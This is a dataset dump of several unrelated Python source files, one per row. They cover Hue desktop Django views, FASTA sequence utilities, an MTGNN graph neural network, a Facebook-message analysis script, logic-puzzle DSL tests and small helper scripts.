content
stringlengths 5
1.05M
|
|---|
"""Unit tests for cutty.projects."""
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import sys
import tempfile
import time
import traceback
import zipfile
from django.shortcuts import render_to_response
from django.http import HttpResponse
from django.core.servers.basehttp import FileWrapper
import django.views.debug
from desktop.lib.django_util import login_notrequired, render_json, render
from desktop.lib.paths import get_desktop_root
from desktop.log.access import access_log_level, access_warn
from desktop.models import UserPreferences
from desktop import appmanager
import desktop.conf
import desktop.log.log_buffer
LOG = logging.getLogger(__name__)
@access_log_level(logging.WARN)
def log_view(request):
"""
We have a log handler that retains the last X characters of log messages.
If it is attached to the root logger, this view will display that history,
otherwise it will report that it can't be found.
"""
l = logging.getLogger()
for h in l.handlers:
if isinstance(h, desktop.log.log_buffer.FixedBufferHandler):
return render_to_response("logs.html", dict(log=[l for l in h.buf]))
return render_to_response("logs.html", dict(log=["No logs found!"]))
@access_log_level(logging.WARN)
def download_log_view(request):
"""
Zip up the log buffer and then return as a file attachment.
"""
l = logging.getLogger()
for h in l.handlers:
if isinstance(h, desktop.log.log_buffer.FixedBufferHandler):
try:
# We want to avoid doing a '\n'.join of the entire log in memory
# in case it is rather big. So we write it to a file line by line
# and pass that file to zipfile, which might follow a more efficient path.
tmp = tempfile.NamedTemporaryFile()
log_tmp = tempfile.NamedTemporaryFile("w+t")
for l in h.buf:
log_tmp.write(l + '\n')
# This is not just for show - w/out flush, we often get truncated logs
log_tmp.flush()
t = time.time()
zip = zipfile.ZipFile(tmp, "w", zipfile.ZIP_DEFLATED)
zip.write(log_tmp.name, "hue-logs/hue-%s.log" % t)
zip.close()
length = tmp.tell()
# if we don't seek to start of file, no bytes will be written
tmp.seek(0)
wrapper = FileWrapper(tmp)
response = HttpResponse(wrapper,content_type="application/zip")
response['Content-Disposition'] = 'attachment; filename=hue-logs-%s.zip' % t
response['Content-Length'] = length
return response
except Exception, e:
logging.exception("Couldn't construct zip file to write logs to!")
return log_view(request)
return render_to_response("logs.html", dict(log=["No logs found!"]))
@access_log_level(logging.DEBUG)
def prefs(request, key=None):
"""Get or set preferences."""
if key is None:
d = dict( (x.key, x.value) for x in UserPreferences.objects.filter(user=request.user))
return render_json(d)
else:
if "set" in request.REQUEST:
try:
x = UserPreferences.objects.get(user=request.user, key=key)
except UserPreferences.DoesNotExist:
x = UserPreferences(user=request.user, key=key)
x.value = request.REQUEST["set"]
x.save()
return render_json(True)
if "delete" in request.REQUEST:
try:
x = UserPreferences.objects.get(user=request.user, key=key)
x.delete()
return render_json(True)
except UserPreferences.DoesNotExist:
return render_json(False)
else:
try:
x = UserPreferences.objects.get(user=request.user, key=key)
return render_json(x.value)
except UserPreferences.DoesNotExist:
return render_json(None)
def bootstrap(request):
"""Concatenates bootstrap.js files from all installed desktop apps."""
# Has some None's for apps that don't have bootsraps.
all_bootstraps = [ (app, app.get_bootstrap_file()) for app in appmanager.DESKTOP_APPS if request.user.has_desktop_permission(action="access", app=app.name) ]
# Iterator over the streams.
concatenated = [ "\n/* %s */\n%s" % (app.name, b.read()) for app, b in all_bootstraps if b is not None ]
# HttpResponse can take an iteratable as the first argument, which
# is what happens here.
return HttpResponse(concatenated, mimetype='text/javascript')
_status_bar_views = []
def register_status_bar_view(view):
global _status_bar_views
_status_bar_views.append(view)
@access_log_level(logging.DEBUG)
def status_bar(request):
"""
Concatenates multiple views together to build up a "status bar"/"status_bar".
These views are registered using register_status_bar_view above.
"""
resp = ""
for view in _status_bar_views:
try:
r = view(request)
if r.status_code == 200:
resp += r.content
else:
LOG.warning("Failed to execute status_bar view %s" % (view,))
except:
LOG.exception("Failed to execute status_bar view %s" % (view,))
return HttpResponse(resp)
def dump_config(request):
# Note that this requires login (as do most apps).
show_private = False
conf_dir = os.path.realpath(get_desktop_root('conf'))
if not request.user.is_superuser:
return HttpResponse("You must be a superuser.")
if request.GET.get("private"):
show_private = True
return render("dump_config.mako", request, dict(
show_private=show_private,
top_level=desktop.lib.conf.GLOBAL_CONFIG,
conf_dir=conf_dir,
apps=appmanager.DESKTOP_MODULES))
if sys.version_info[0:2] <= (2,4):
def _threads():
import threadframe
return threadframe.dict().iteritems()
else:
def _threads():
return sys._current_frames().iteritems()
@access_log_level(logging.WARN)
def threads(request):
"""Dumps out server threads. Useful for debugging."""
if not request.user.is_superuser:
return HttpResponse("You must be a superuser.")
out = []
for thread_id, stack in _threads():
out.append("Thread id: %s" % thread_id)
for filename, lineno, name, line in traceback.extract_stack(stack):
out.append(" %-20s %s(%d)" % (name, filename, lineno))
out.append(" %-80s" % (line))
out.append("")
return HttpResponse("\n".join(out), content_type="text/plain")
@login_notrequired
def index(request):
return render("index.mako", request, dict(
feedback_url=desktop.conf.FEEDBACK_URL.get(),
send_dbug_messages=desktop.conf.SEND_DBUG_MESSAGES.get()
))
def serve_404_error(request, *args, **kwargs):
"""Registered handler for 404. We just return a simple error"""
access_warn(request, "404 not found")
return render_to_response("404.html", dict(uri=request.build_absolute_uri()))
def serve_500_error(request, *args, **kwargs):
"""Registered handler for 500. We use the debug view to make debugging easier."""
if desktop.conf.HTTP_500_DEBUG_MODE.get():
return django.views.debug.technical_500_response(request, *sys.exc_info())
return render_to_response("500.html")
_LOG_LEVELS = {
"critical": logging.CRITICAL,
"error": logging.ERROR,
"warning": logging.WARNING,
"info": logging.INFO,
"debug": logging.DEBUG
}
_MAX_LOG_FRONTEND_EVENT_LENGTH = 1024
_LOG_FRONTEND_LOGGER = logging.getLogger("desktop.views.log_frontend_event")
@login_notrequired
def log_frontend_event(request):
"""
Logs arguments to server's log. Returns an
empty string.
Parameters (specified via either GET or POST) are
"logname", "level" (one of "debug", "info", "warning",
"error", or "critical"), and "message".
"""
def get(param, default=None):
return request.REQUEST.get(param, default)
level = _LOG_LEVELS.get(get("level"), logging.INFO)
msg = "Untrusted log event from user %s: %s" % (
request.user,
get("message", "")[:_MAX_LOG_FRONTEND_EVENT_LENGTH])
_LOG_FRONTEND_LOGGER.log(level, msg)
return HttpResponse("")
def who_am_i(request):
"""
Returns username and FS username, and optionally sleeps.
"""
try:
sleep = float(request.REQUEST.get("sleep") or 0.0)
except ValueError:
sleep = 0.0
time.sleep(sleep)
return HttpResponse(request.user.username + "\t" + request.fs.user + "\n")
# If the app's conf.py has a config_validator() method, call it.
CONFIG_VALIDATOR = 'config_validator'
#
# Cache config errors because (1) they mostly don't go away until restart,
# and (2) they can be costly to compute. So don't stress the system just because
# the dock bar wants to refresh every n seconds.
#
# The actual viewing of all errors may choose to disregard the cache.
#
_CONFIG_ERROR_LIST = None
def _get_config_errors(cache=True):
"""Returns a list of (confvar, err_msg) tuples."""
global _CONFIG_ERROR_LIST
if not cache or _CONFIG_ERROR_LIST is None:
error_list = [ ]
for module in appmanager.DESKTOP_MODULES:
# Get the config_validator() function
try:
validator = getattr(module.conf, CONFIG_VALIDATOR)
except AttributeError:
continue
if not callable(validator):
LOG.warn("Auto config validation: %s.%s is not a function" %
(module.conf.__name__, CONFIG_VALIDATOR))
continue
try:
error_list.extend(validator())
except Exception, ex:
LOG.exception("Error in config validation by %s: %s" % (module.nice_name, ex))
_CONFIG_ERROR_LIST = error_list
return _CONFIG_ERROR_LIST
def check_config(request):
"""Check config and view for the list of errors"""
if not request.user.is_superuser:
return HttpResponse("You must be a superuser.")
conf_dir = os.path.realpath(get_desktop_root('conf'))
return render('check_config.mako', request, dict(
error_list=_get_config_errors(cache=False),
conf_dir=conf_dir))
def status_bar_config_check(request):
"""Alert administrators about configuration problems."""
if not request.user.is_superuser:
return HttpResponse('')
error_list = _get_config_errors()
if not error_list:
# Return an empty response, rather than using the mako template, for performance.
return HttpResponse('')
return render('config_alert_dock.mako',
request,
dict(error_list=error_list),
force_template=True)
register_status_bar_view(status_bar_config_check)
|
from Bio import SeqIO
import pygustus.util as util
def summarize_acgt_content(inputfile):
util.check_file(inputfile)
letters = ['a', 'c', 'g', 't', 'n']
file_sum = dict.fromkeys(letters, 0)
file_sum.update({'rest': 0})
seq_count = 0
for seq_record in SeqIO.parse(inputfile, 'fasta'):
seq_count += 1
seq_sum = 0
print_seq_acgt = ''
for l in letters:
value = seq_record.seq.lower().count(l)
seq_sum += value
if l != 'n':
print_seq_acgt += f' {value} {l}'
else:
if value > 0:
print_seq_acgt += f' {value} {l}'
update_values(file_sum, l, value)
rest = len(seq_record) - seq_sum
if rest > 0:
print_seq_acgt += f' {rest} ?'
update_values(file_sum, 'rest', rest)
print_seq_line = f'{len(seq_record)} bases.\t{seq_record.id} BASE COUNT {print_seq_acgt}'
print(print_seq_line)
summary_acgt = ''
complete_bp = 0
sum_acgt = 0
for l in letters:
if l != 'n':
summary_acgt += f' {file_sum[l]} {l}'
complete_bp += file_sum[l]
sum_acgt += complete_bp
if file_sum['n'] > 0:
summary_acgt += f' {file_sum[l]} {l}'
complete_bp += file_sum['n']
if file_sum['rest'] > 0:
summary_acgt += f' {file_sum[l]} {l}'
complete_bp += file_sum['rest']
gc = 100 * float(file_sum['g'] + file_sum['c']) / sum_acgt
print(f'summary: BASE COUNT {summary_acgt}')
print(f'total {complete_bp}bp in {seq_count} sequence(s).')
print(f'gc: {gc}%')
def update_values(file_sum, key, value):
cur_value = file_sum[key]
file_sum.update({key: cur_value + value})
def split(inputfile, outputdir, chunksize, overlap, partition_sequences, minsize, max_seq_size):
util.check_file(inputfile)
util.rmtree_if_exists(outputdir, even_none_empty=True)
util.mkdir_if_not_exists(outputdir)
fileidx = 0
run = 0
filesize = 0
records_to_write = list()
records = list(SeqIO.parse(inputfile, 'fasta'))
run_information = list()
for seq_record in records:
seqsize = len(seq_record)
if seqsize > max_seq_size:
if len(records_to_write) > 0:
fileidx += 1
run += 1
run_information.append(
{
'run': run,
'fileidx': fileidx,
'seqinfo': {x.id: [0, 0] for x in records_to_write}
})
write_file(records_to_write, inputfile, outputdir, fileidx)
filesize = 0
fileidx += 1
write_file([seq_record], inputfile, outputdir, fileidx)
if partition_sequences:
if chunksize == 0:
chunksize = 2500000
if chunksize > 3500000:
chunksize = 3500000
if overlap == 0:
overlap = int(chunksize / 6)
chunks = list()
go_on = True
while go_on:
if len(chunks) == 0:
chunks.append([1, chunksize])
else:
last_start, last_end = chunks[-1]
start = last_end + 1 - overlap
end = start + chunksize - 1
if end >= seqsize:
end = seqsize
go_on = False
chunks.append([start, end])
for c in chunks:
run += 1
run_information.append(
{
'run': run,
'fileidx': fileidx,
'seqinfo': {seq_record.id: [c[0], c[1]]}
})
else:
run += 1
run_information.append(
{
'run': run,
'fileidx': fileidx,
'seqinfo': {seq_record.id: [0, 0]}
})
elif minsize == 0 or filesize + seqsize >= minsize or seq_record.id == records[-1].id:
records_to_write.append(seq_record)
fileidx += 1
run += 1
run_information.append(
{
'run': run,
'fileidx': fileidx,
'seqinfo': {x.id: [0, 0] for x in records_to_write}
})
write_file(records_to_write, inputfile, outputdir, fileidx)
filesize = 0
else:
records_to_write.append(seq_record)
filesize += seqsize
return run_information
def write_file(records_to_write, inputfile, outputdir, fileidx):
splitpath = util.create_split_filenanme(
inputfile, outputdir, fileidx)
SeqIO.write(records_to_write, splitpath, 'fasta')
records_to_write.clear()
def get_sequence_count(inputfile):
util.check_file(inputfile)
sequences = list(SeqIO.parse(inputfile, 'fasta'))
return len(sequences)
def get_sequence_size(inputfile, idx=0):
util.check_file(inputfile)
sequences = list(SeqIO.parse(inputfile, 'fasta'))
return len(sequences[idx])
def get_sequence_id(inputfile, idx=0):
util.check_file(inputfile)
sequences = list(SeqIO.parse(inputfile, 'fasta'))
return sequences[idx].id
|
import PIL
import glob
from PIL import Image
number = 0
image_list = []
for File in glob.glob('positive_images/*.pgm'):
im = Image.open(File)
rgb_im = im.convert('RGB')
rgb_im.save('newImages/pos-' + str(number)+'.jpg')
number = number + 1
|
CLIQZDEX_URL = "https://raw.githubusercontent.com/InTEGr8or/cliqzdex/main/index.yaml"
quiz_url = "https://raw.githubusercontent.com/InTEGr8or/cliqzdex/main/quizzes/"
default_max_questions = 10
CONFIG = {
"cliqzdex_url": "https://raw.githubusercontent.com/InTEGr8or/cliqzdex/main/index.yaml",
"quiz_url": "https://raw.githubusercontent.com/InTEGr8or/cliqzdex/main/quizzes/",
"newline": '\n'
}
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
ENDC = '\033[0m'
|
from django import template
register = template.Library()
@register.inclusion_tag('blog/tags/meta.html')
def meta(*objects):
"""Вывод description and title категории"""
try:
object = objects[0][0]
except IndexError:
object = []
return {"object": object}
|
"""Custom log messages."""
import re
RE_BIND_FAILED = re.compile(r".*Bind for.*:(\d*) failed: port is already allocated.*")
def format_message(message: str) -> str:
"""Return a formated message if it's known."""
match = RE_BIND_FAILED.match(message)
if match:
return (
f"Port '{match.group(1)}' is already in use by something else on the host."
)
return message
|
from .mtgnn_layers import *
class MTGNN(nn.Module):
r"""An implementation of the Multivariate Time Series Forecasting Graph Neural Networks.
For details see this paper: `"Connecting the Dots: Multivariate Time Series Forecasting with Graph Neural Networks." <https://arxiv.org/pdf/2005.11650.pdf>`_
Args:
gcn_true (bool) : whether to add graph convolution layer.
buildA_true (bool) : whether to construct adaptive adjacency matrix.
gcn_depth (int) : graph convolution depth.
num_nodes (int) : number of nodes in the graph.
dropout (float, optional) : droupout rate, default 0.3.
static_feat (Pytorch Float Tensor, optional) : static feature, default None.
predefined_A (Pytorch Float Tensor, optional) : predefined adjacency matrix, default None.
subgraph_size (int, optional) : size of subgraph, default 20.
node_dim (int, optional) : dimension of nodes, default 40.
dilation_exponential (int, optional) : dilation exponential, default 1.
conv_channels (int, optional) : convolution channels, default 32.
residual_channels (int, optional) : residual channels, default 32.
skip_channels (int, optional) : skip channels, default 64.
end_channels (int, optional): end channels, default 128.
seq_length (int, optional) : length of input sequence, default 12.
in_dim (int, optional) : input dimension, default 2.
out_dim (int, optional) : output dimension, default 12.
layers (int, optional) : number of layers, default 3.
propalpha (float, optional) : prop alpha, ratio of retaining the root nodes's original states in mix-hop propagation, a value between 0 and 1, default 0.05.
tanhalpha (float, optional) : tanh alpha for generating adjacency matrix, alpha controls the saturation rate, default 3.
layer_norm_affline (bool, optional) : whether to do elementwise affine in Layer Normalization, default True.
"""
def __init__(self, gcn_true, buildA_true, gcn_depth, num_nodes, predefined_A=None, static_feat=None, dropout=0.3, subgraph_size=20, node_dim=40, dilation_exponential=1, conv_channels=32, residual_channels=32, skip_channels=64, end_channels=128, seq_length=12, in_dim=2, out_dim=12, layers=3, propalpha=0.05, tanhalpha=3, layer_norm_affline=True):
super(MTGNN, self).__init__()
self.gcn_true = gcn_true
self.buildA_true = buildA_true
self.num_nodes = num_nodes
self.dropout = dropout
self.predefined_A = predefined_A
self.filter_convs = nn.ModuleList()
self.gate_convs = nn.ModuleList()
self.residual_convs = nn.ModuleList()
self.skip_convs = nn.ModuleList()
self.gconv1 = nn.ModuleList()
self.gconv2 = nn.ModuleList()
self.norm = nn.ModuleList()
self.start_conv = nn.Conv2d(in_channels=in_dim,
out_channels=residual_channels,
kernel_size=(1, 1))
self.gc = graph_constructor(num_nodes, subgraph_size, node_dim, alpha=tanhalpha, static_feat=static_feat)
self.seq_length = seq_length
kernel_size = 7
if dilation_exponential>1:
self.receptive_field = int(1+(kernel_size-1)*(dilation_exponential**layers-1)/(dilation_exponential-1))
else:
self.receptive_field = layers*(kernel_size-1) + 1
for i in range(1):
if dilation_exponential>1:
rf_size_i = int(1 + i*(kernel_size-1)*(dilation_exponential**layers-1)/(dilation_exponential-1))
else:
rf_size_i = i*layers*(kernel_size-1)+1
new_dilation = 1
for j in range(1,layers+1):
if dilation_exponential > 1:
rf_size_j = int(rf_size_i + (kernel_size-1)*(dilation_exponential**j-1)/(dilation_exponential-1))
else:
rf_size_j = rf_size_i+j*(kernel_size-1)
self.filter_convs.append(dilated_inception(residual_channels, conv_channels, dilation_factor=new_dilation))
self.gate_convs.append(dilated_inception(residual_channels, conv_channels, dilation_factor=new_dilation))
self.residual_convs.append(nn.Conv2d(in_channels=conv_channels,
out_channels=residual_channels,
kernel_size=(1, 1)))
if self.seq_length>self.receptive_field:
self.skip_convs.append(nn.Conv2d(in_channels=conv_channels,
out_channels=skip_channels,
kernel_size=(1, self.seq_length-rf_size_j+1)))
else:
self.skip_convs.append(nn.Conv2d(in_channels=conv_channels,
out_channels=skip_channels,
kernel_size=(1, self.receptive_field-rf_size_j+1)))
if self.gcn_true:
self.gconv1.append(mixprop(conv_channels, residual_channels, gcn_depth, dropout, propalpha))
self.gconv2.append(mixprop(conv_channels, residual_channels, gcn_depth, dropout, propalpha))
if self.seq_length>self.receptive_field:
self.norm.append(LayerNorm((residual_channels, num_nodes, self.seq_length - rf_size_j + 1),elementwise_affine=layer_norm_affline))
else:
self.norm.append(LayerNorm((residual_channels, num_nodes, self.receptive_field - rf_size_j + 1),elementwise_affine=layer_norm_affline))
new_dilation *= dilation_exponential
self.layers = layers
self.end_conv_1 = nn.Conv2d(in_channels=skip_channels,
out_channels=end_channels,
kernel_size=(1,1),
bias=True)
self.end_conv_2 = nn.Conv2d(in_channels=end_channels,
out_channels=out_dim,
kernel_size=(1,1),
bias=True)
if self.seq_length > self.receptive_field:
self.skip0 = nn.Conv2d(in_channels=in_dim, out_channels=skip_channels, kernel_size=(1, self.seq_length), bias=True)
self.skipE = nn.Conv2d(in_channels=residual_channels, out_channels=skip_channels, kernel_size=(1, self.seq_length-self.receptive_field+1), bias=True)
else:
self.skip0 = nn.Conv2d(in_channels=in_dim, out_channels=skip_channels, kernel_size=(1, self.receptive_field), bias=True)
self.skipE = nn.Conv2d(in_channels=residual_channels, out_channels=skip_channels, kernel_size=(1, 1), bias=True)
self.idx = torch.arange(self.num_nodes)
def forward(self, input, idx=None):
"""
Making a forward pass of MTGNN.
Arg types:
* input (PyTorch Float Tensor) - input sequence, with shape (batch size, input dimension, number of nodes, input sequence length).
* idx (Tensor, optional): input indices, a permutation of the number of nodes, default None (no permutation).
Return types:
* x (PyTorch Float Tensor) - output sequence for prediction, with shape (batch size, input sequence length, number of nodes, 1).
"""
seq_len = input.size(3)
assert seq_len==self.seq_length, 'input sequence length not equal to preset sequence length'
if self.seq_length<self.receptive_field:
input = nn.functional.pad(input,(self.receptive_field-self.seq_length,0,0,0))
if self.gcn_true:
if self.buildA_true:
if idx is None:
adp = self.gc(self.idx.to(input.device))
else:
adp = self.gc(idx)
else:
adp = self.predefined_A
x = self.start_conv(input)
skip = self.skip0(F.dropout(input, self.dropout, training=self.training))
for i in range(self.layers):
residual = x
filter = self.filter_convs[i](x)
filter = torch.tanh(filter)
gate = self.gate_convs[i](x)
gate = torch.sigmoid(gate)
x = filter * gate
x = F.dropout(x, self.dropout, training=self.training)
s = x
s = self.skip_convs[i](s)
skip = s + skip
if self.gcn_true:
x = self.gconv1[i](x, adp)+self.gconv2[i](x, adp.transpose(1,0))
else:
x = self.residual_convs[i](x)
x = x + residual[:, :, :, -x.size(3):]
if idx is None:
x = self.norm[i](x,self.idx)
else:
x = self.norm[i](x,idx)
skip = self.skipE(x) + skip
x = F.relu(skip)
x = F.relu(self.end_conv_1(x))
x = self.end_conv_2(x)
return x
|
import logging
import sys
from metanime import Anime, Renderer
def render(season):
animes = Anime.load(f'seasons/{season}.yml')
renderer = Renderer('views', 'docs')
for anime in animes:
renderer.render_anime(anime)
renderer.render_season(season, animes)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
render(sys.argv[1])
|
#!/usr/bin/env python
from yaml import load, dump
from collections import OrderedDict
import time, os
from visualize import visualize
DIV = '\n'+ '='*64 + '\n'
start_time = time.time()
def usage():
pass
# Iterate over all conversation threads
def summarize():
print 'Opening file... ',
file = open('messages_jacob.yaml', 'r')
print 'successful!'
print 'Parsing file... ',
messages = load(file)
print 'successful!' + DIV
x = 1
for thread in messages:
message_contribution = {'Jacob Ziontz': 0}
# Iterate over all messages in a thread
for message in thread['messages']:
try:
message_contribution[message['sender']] += 1
except KeyError:
message_contribution[message['sender']] = 1
# Print outputs
print 'Thread', x
print len(message_contribution), 'participants, ',
print len(thread['messages'] ), 'messages'
for participant, count in message_contribution.iteritems():
print '\t', participant.encode('utf-8').strip(), ' - ', count
print '\n'
x += 1
print 'Total number of conversations:', x
def conversation_separator():
print 'Opening file... ',
file = open('messages_jacob.yaml', 'r')
print 'successful!'
print 'Parsing file... ',
messages = load(file)
print 'successful!' + DIV
count = 1
for thread in messages:
filename = 'conversations_jacob/%d.yaml' % count
if not os.path.exists('conversations_jacob'):
print 'Creating directory conversations_jacob'
try:
os.makedirs('conversations_jacob')
except OSError as exc: # Guard against race condition
raise
print 'Writing', filename
conversation_file = open(filename, 'w')
dump(thread, conversation_file)
count += 1
print '(%s seconds)' % round((time.time() - start_time), 2)
# Generates insight data on a single conversation thread
def insight():
print 'Opening thread... ',
file = open('conversations_test/440.yaml', 'r')
print 'successful!'
print 'Loading thread... ',
thread = load(file)
print 'successful!' + DIV
# 1. Pie chart showing contribution of messages by each person
message_contribution = {'Alvin Cao': 0}
for message in thread['messages']:
try:
message_contribution[message['sender']] += 1
except KeyError:
message_contribution[message['sender']] = 1
print message_contribution
# 2. Line chart showing messages per month
messages_over_time = {}
for message in thread['messages']:
try:
messages_over_time[message['date'].partition('T')[0][:7]] += 1
except KeyError:
messages_over_time[message['date'].partition('T')[0][:7]] = 1
for elem in OrderedDict(sorted(messages_over_time.items(), key=lambda t: t[0])).items():
messages_over_time[elem[0]] = elem[1]
def break_message(message):
if message == '': return '(sticker/emoji)'
if len(message) <= 56: return message
accumulate = 0
broken_message = ''
for word in message.split(' '):
if len(word) >= 56:
return word[:56] + '<br>' + word[56:]
accumulate += len(word) + 1
print accumulate
broken_message += word + ' '
if accumulate >= 56:
broken_message += '<br>'
accumulate = 0
return broken_message
# 3. Get first message
for message in thread['messages']:
first_message = message['sender'] + ', '
first_message += message['date'].partition('T')[0][:10]
first_message += '<br>' + break_message(message['message'])
break
print first_message
visualize(message_contribution, messages_over_time, first_message)
# Execute one at a time in order
#summarize()
#conversation_separator()
insight()
|
import collections
from data.logic.dsl import *
from spec.mamba import *
with description('dsl'):
with before.each:
self.dimensions = DimensionFactory()
self.model = Model(self.dimensions)
with it('defines dimensions'):
(Andy, Bob, Cathy) = name = self.dimensions(name=['Andy', 'Bob', 'Cathy'])
(CEO, Project_Manager, Analyst) = occupation = self.dimensions(
occupation=['CEO', 'Project Manager', 'analyst'])
(_10, _11, _12) = age = self.dimensions(age=[10, 11, 12])
expect(self.dimensions.dimensions()).to(have_len(3))
with description('with setup'):
with before.each:
(self.Andy, self.Bob, self.Cathy) = self.name = self.dimensions(
name=['Andy', 'Bob', 'Cathy'])
(self.CEO, self.Project_Manager, self.Analyst) = self.occupation = (
self.dimensions(occupation=['CEO', 'Project Manager', 'analyst']))
(self._10, self._11, self._12) = self.age = self.dimensions(
age=[10, 11, 12])
with it('accumulates constraints'):
self.model(self.Andy == self.Analyst)
expect(self.model.constraints).to(have_len(1))
with it('supports diverse constraints'):
self.model(self.Andy.occupation == self.Analyst)
self.model((11 == self.Bob.age) ^ (11 == self.Analyst.age))
self.model(self.CEO.age + 2 == self.Andy.age)
expect(str(self.model)).to(look_like("""
assign:
name["Andy"].occupation["analyst"] in {0,1}
name["Bob"].age in {10..12}
occupation["analyst"].age in {10..12}
name["Andy"].age in {10..12}
occupation["CEO"].age in {10..12}
subject to:
(name["Andy"].occupation["analyst"] == True)
(((name["Bob"].age == 11) + (occupation["analyst"].age == 11)) == 1)
(name["Andy"].age == (occupation["CEO"].age + 2))
"""))
with description('2D solutions'):
with before.each:
(self.Andy, self.Bob, self.Cathy) = self.name = self.dimensions(
name=['Andy', 'Bob', 'Cathy'])
(self._10, self._11, self._12) = self.age = self.dimensions(
age=[10, 11, 12])
with it('volunteers a valid solution without any context'):
name_counter = collections.Counter()
age_counter = collections.Counter()
solver = self.model.load('Mistral')
solver.solve()
expect(str(solver)).to(look_like("""
name | age
Andy | 10
Bob | 11
Cathy | 12
"""))
with it('finds correct solution with constraints'):
# Force Bob == 12.
self.model(~self.Andy[12])
self.model(~self.Cathy[12])
# Force Cathy == 10
self.model(~self.name['Cathy'][11])
expect(str(self.model)).to(look_like("""
assign:
name["Andy"].age in {10..12}
name["Cathy"].age in {10..12}
subject to:
((1 - (name["Andy"].age == 12)) == True)
((1 - (name["Cathy"].age == 12)) == True)
((1 - (name["Cathy"].age == 11)) == True)
"""))
solver = self.model.load('Mistral')
expect(solver.solve()).to(be_true)
expect(str(solver)).to(look_like("""
name | age
Andy | 11
Bob | 12
Cathy | 10
"""))
with it('finds solutions with reified dimension inequalities'):
# Force Andy between Cathy and Bob.
self.model(self.name['Andy']['age'] > self.name['Cathy']['age'])
self.model(self.name['Andy']['age'] < self.name['Bob']['age'])
solver = self.model.load('Mistral')
expect(solver.solve()).to(be_true)
expect(str(solver)).to(look_like("""
name | age
Andy | 11
Bob | 12
Cathy | 10
"""))
with it('finds solutions with reified dimension offsets'):
# Cathy = Bob - 2.
self.model(self.name['Cathy']['age'] == self.name['Bob']['age'] - 2)
solver = self.model.load('Mistral')
expect(solver.solve()).to(be_true)
expect(str(solver)).to(look_like("""
name | age
Andy | 11
Bob | 12
Cathy | 10
"""))
with it('support for abs()'):
self.model(abs(self.name['Andy']['age'] - self.name['Cathy']['age']) == 2)
self.model(self.name['Cathy']['age'] > self.name['Andy']['age'])
solver = self.model.load('Mistral')
expect(solver.solve()).to(be_true)
expect(str(solver)).to(look_like("""
name | age
Andy | 10
Bob | 11
Cathy | 12
"""))
expect(solver.solve()).to(be_false)
with description('3D solutions'):
with before.each:
(self.Andy, self.Bob, self.Cathy) = self.name = self.dimensions(
name=['Andy', 'Bob', 'Cathy'])
(self.CEO, self.Project_Manager, self.Analyst) = self.occupation = (
self.dimensions(occupation=['CEO', 'Project Manager', 'Analyst']))
(self._10, self._11, self._11) = self.age = self.dimensions(
age=[10, 11, 11])
with it('volunteers a valid solution without any context'):
seen = collections.Counter()
solver = self.model.load('Mistral')
solver.solve()
for variable_name, value in self.model._variable_cache.items():
x, y = variable_name.split('.')
if value.get_value():
seen[x] += 1
seen[y] += 1
# Each value is part of 2 tables except for 11 which appears 2x.
expect(seen).to(equal({
'name["Andy"]': 2, 'name["Bob"]': 2, 'name["Cathy"]': 2,
'occupation["CEO"]': 2, 'occupation["Project Manager"]': 2,
'occupation["Analyst"]': 2,
'age[10]': 2, 'age[11]': 4,
}))
with it('produces a correct solution with constraints'):
# CEO is not the youngest.
self.model(self.CEO['age'] >= self.Project_Manager['age'])
self.model(self.CEO['age'] >= self.Analyst['age'])
# Andy is a year younger than Bob.
self.model(self.Andy['age'] + 1 == self.Bob['age'])
# Cathy is older than the Project_Manager.
self.model(self.Cathy['age'] > self.Project_Manager['age'])
# Bob is either the CEO or the Project Manager.
self.model(self.Bob['Analyst'] | self.Bob['Project Manager'])
solver = self.model.load('Mistral')
expect(solver.solve()).to(be_true)
expect(str(solver)).to(look_like("""
name | occupation | age
Andy | Project Manager | 10
Bob | Analyst | 11
Cathy | CEO | 11
"""))
# Verify there are no other solutions.
expect(solver.solve()).to(be_false)
with it('infers a solution despite duplicates'):
# Cathy is CEO (constrain the two values with cardinality of 1).
self.model(self.Cathy == self.CEO)
# CEO is older (constrains CEO to one of the 11 values).
self.model(self.CEO.age > self.Project_Manager.age)
solver = self.model.load('Mistral')
solutions = []
while solver.solve():
solutions.append(str(solver))
solutions = list(sorted(solutions))
expected_solutions = [
"""
name | occupation | age
Andy | Analyst | 11
Bob | Project Manager | 10
Cathy | CEO | 11
""",
"""
name | occupation | age
Andy | Project Manager | 10
Bob | Analyst | 11
Cathy | CEO | 11
""",
]
expect(solutions).to(have_len(len(expected_solutions)))
for solution, expected in zip(solutions, expected_solutions):
expect(solution).to(look_like(expected))
with it('models additional variables'):
# Cathy is CEO (constrain the two values with cardinality of 1).
self.model(self.Cathy == self.CEO)
# CEO is older (constrains CEO to one of the 11 values).
self.model(self.CEO.age > self.Project_Manager.age)
ceo_is_old = variable('ceo_is_old')
self.model(ceo_is_old == (self.CEO == self._11))
expect(str(self.model)).to(look_like("""
assign:
name["Cathy"].occupation["CEO"] in {0,1}
occupation["CEO"].age[10] in {0,1}
occupation["CEO"].age[11] in {0,1}
occupation["Project Manager"].age[10] in {0,1}
occupation["Project Manager"].age[11] in {0,1}
ceo_is_old in {0,1}
subject to:
(name["Cathy"].occupation["CEO"] == True)
((10*occupation["CEO"].age[10] + 11*occupation["CEO"].age[11]) > (10*occupation["Project Manager"].age[10] + 11*occupation["Project Manager"].age[11]))
(occupation["CEO"].age[11] == ceo_is_old)
"""))
|
import cv2
import numpy as np
from DAL_utils.overlaps_cuda.rbbox_overlaps import rbbx_overlaps
from DAL_utils.overlaps.rbox_overlaps import rbox_overlaps
a = np.array([[10, 10, 20, 10, 0]], dtype=np.float32)
b = np.array([[10, 10, 20, 10, 0]], dtype=np.float32)
c = rbbx_overlaps(a, b)
d = rbox_overlaps(a, b)
print(c)
print(d)
# def iou_rotate_calculate(boxes1, boxes2):
